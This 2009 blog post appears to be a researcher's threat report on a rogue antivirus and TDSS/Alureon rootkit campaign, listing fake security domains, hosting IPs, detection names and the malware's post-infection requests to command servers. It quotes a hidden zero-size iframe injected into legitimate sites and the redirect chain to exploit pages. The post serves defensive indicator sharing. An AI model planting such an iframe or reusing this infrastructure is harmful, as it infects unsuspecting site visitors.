Monday, April 20, 2009

Black Hat SEO and Rogue Antivirus p.8

The silent threat: Black Hat SEO and Rogue Antivirus

Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan

READ THIS page if you need more information

A quick move to this IP block 209.44.126.0/24 by "Netelligent Hosting Services Inc" which hosts several fake av websites as well as exploits to spread the trojan TDSS/Alureon.

All of these have been found following iframe injected on legit websites, poisoned keyworks in Google Search Engine and links on ad network (screenshot below)


Check it out - maybe someone have access to your PC right now! Protect yourself.

Also Google show 14,800 result for this phrase.



Detection:

Trojan TDSS
Trojan DNSChanger
Trojan Kryptik
Trojan FakeSpyGuard
Trojan InternetAntivirusPro

Sites serving for the fake antivirus campaign:

209.44.126.14

activesecurityshield.com
anytoplikedsite.com
basevirusscan.com
bestfiresfull.com
bestsecurityupdate.com
checkonlinesecurity.com
cleanyourpcspace.com
destroyvirusnow.com
fastsecurityscan.com
fastviruscleaner.com
firstscansecurity.com
fuc*moneycash.com
fullandtotalsecurity.com
fullsecurityshield.com
getpcguard.com
getscanonline.com
getsecuritywall.com
greatsecurityshield.com
inetsecuritycenter.com
initialsecurityscan.com
mostpopularscan.com
myfirstsecurityscan.com
mytoplikedsite.com
mytopvirusscan.com
onlinescandetect.com
onlinescanservice.com
popularpcscan.com
runpcscannow.com
scanalertspage.com
scanbaseonline.com
scanprotectiononline.com
scanvistanow.net
securityscan4you.com
securitytopagent.com
thegreatsecurity.com
todaybestscan.com
topsecurity4you.com
topsecurityapp.com
topsoftscanner.com
totalpcdefender.com
totalvirusdestroyer.com
truescansecurity.com
trustsecurityshield.com
upyoursecurity.com
virustopshield.com
vistastabilitynow.com
vistastabilitynow.net
websecuritymaster.com
websecurityvoice.com
yourstabilitysystem.com

209.44.126.16
systemsecurityonline.com
systemsecuritytool.com

209.44.126.29
individualpeople.biz (will be analyzed below)

209.44.126.14
209.44.126.15
209.44.126.16
209.44.126.17
209.44.126.22
209.44.126.23


NS for rogue fake av websites

209.44.126.32
asmmnation.com
ThreatExpert report
In conjunction with an IP in ukraine : Symantec write up



On this IP 209.44.126.29 we also have a couple of page with exploits which leads to the trojan TDSS (Alureon).

I will take this domain for example "individualpeople[.]biz"

Malicious script (IFRAME) inserted. Redirection Analysis

<iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

Redirects to the page below which host several exploits. Javascript Analysis (Wepawet)

hxxp://individualpeople.biz/go.php?sid=6

Anubis Report

hxxp://209.44.126.30/unsecurity/pdf.php

Wepawet Analysis - VirusTotal

to finally load this page

hxxp://209.44.126.30/unsecurity/load.php

VirusTotal - Anubis

Detections:

W32/Alureon.B!Generic
Win32.Rootkit.TDSS.eyj.4
Packed.Win32.Tdss.f
Trojan.Win32.FakeSpyguard
Trojan:Win32/Alureon.gen!J
Trojan/Fakealert.gen

--------------------------------------

HTTP activity after infection

92.48.91.145:80 - [trafficstatic.net]

Request: GET /banner/crcmds/main
Response: 200 "OK"
Request: GET /banner/crcmds/init
Response: 200 "OK"
Request: GET /banner/uacsrcr.dat
Response: 200 "OK"
Request: GET /banner/crcmds/update
Response: 200 "OK"
Request: GET /banner/crfiles/uacd
Response: 200 "OK"
Request: GET /banner/crfiles/uacc
Response: 200 "OK"
Request: GET /banner/crfiles/uaclog
Response: 200 "OK"
Request: GET /banner/crfiles/uacmask
Response: 200 "OK"
Request: GET /banner/crfiles/uacserf
Response: 200 "OK"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/builds/bbr
Response: 200 "OK"
Request: GET /banner/crfiles/uacbbr
Response: 200 "OK"

72.233.114.126:80 - [statsanalist.cn]

Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5
Response: 200 "OK"
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5
Response: 200 "OK"


IPs implicated:

209.44.126.14
209.44.126.15
209.44.126.16
209.44.126.17
209.44.126.22
209.44.126.23
209.44.126.29
209.44.126.32

Other domain in conjunction can be found using ThreatExpert

/banner/crcmds/main

Report 1
Report 2

92.48.91.144
trafficstatic.com
explorerex.com
windowslogonex.com

92.48.91.145
trafficstatic.net
ThreatExpert Report

95.211.14.159
golddiggero1.com

76.76.103.162
webieupdate.net

94.76.208.32
symupdate2.com
ThreatExpert Report

72.233.114.125
webnicrisoft.net
ThreatExpert Report

64.213.140.254
webmsupdate.net
ThreatExpert Report